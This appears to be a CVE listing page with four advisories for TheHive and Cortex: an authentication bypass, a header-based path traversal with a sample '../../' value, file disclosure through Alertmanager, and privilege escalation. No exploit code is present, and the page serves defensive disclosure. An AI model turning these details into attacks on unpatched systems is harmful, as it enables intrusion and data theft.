CVSS: 10.0EPSS: 0%CPEs: 4EXPL: 0CVE-2023-39069
https://notcve.org/view.php?id=CVE-2023-39069
11 Sep 2023 — An issue in StrangeBee TheHive v.5.0.8, v.4.1.21 and Cortex v.3.1.6 allows a remote attacker to gain privileges via Active Directory authentication mechanism. Un problema en StrangeBee TheHive v.5.0.8, v.4.1.21 y Cortex v.3.1.6 permite a un atacante remoto obtener privilegios a través del mecanismo de autenticación de Directorio Activo. • https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2022-001%3A%20Authentication%20bypass%20due%20to%20incomplete%20checks%20in%20the%20Active%20Directory%20authentication%20module.md • CWE-287: Improper Authentication •
CVSS: 5.3EPSS: 0%CPEs: 1EXPL: 0CVE-2021-36157 – cortex: Grafana Cortex directory traversal
https://notcve.org/view.php?id=CVE-2021-36157
03 Aug 2021 — An issue was discovered in Grafana Cortex through 1.9.0. The header value X-Scope-OrgID is used to construct file paths for rules files, and if crafted to conduct directory traversal such as ae ../../sensitive/path/in/deployment pathname, then Cortex will attempt to parse a rules file at that location and include some of the contents in the error message. (Other Cortex API requests can also be sent a malicious OrgID header, e.g., tricking the ingester into writing metrics to a different location, but the ef... • https://github.com/cortexproject/cortex/pull/4375 • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •
CVSS: 5.5EPSS: 0%CPEs: 1EXPL: 0CVE-2021-31232
https://notcve.org/view.php?id=CVE-2021-31232
30 Apr 2021 — The Alertmanager in CNCF Cortex before 1.8.1 has a local file disclosure vulnerability when -experimental.alertmanager.enable-api is used. The HTTP basic auth password_file can be used as an attack vector to send any file content via a webhook. The alertmanager templates can be used as an attack vector to send any file content because the alertmanager can load any text file specified in the templates list. Alertmanager en CNCF Cortex versiones anteriores a 1.8.1, presenta una vulnerabilidad de divulgación d... • https://community.grafana.com/c/security-announcements •
CVSS: 7.2EPSS: 0%CPEs: 1EXPL: 0CVE-2018-20226
https://notcve.org/view.php?id=CVE-2018-20226
21 Dec 2018 — An organization administrator can add a super administrator in THEHIVE PROJECT Cortex before 2.1.3 due to the lack of overriding the Role.toString method. Un administrador de la organización puede añadir un superadministrador en THEHIVE PROJECT Cortex, en versiones anteriores a la 2.1.3, debido a la falta de anulación del método Role.toString. • https://github.com/TheHive-Project/Cortex/blob/2.1.3/CHANGELOG.md •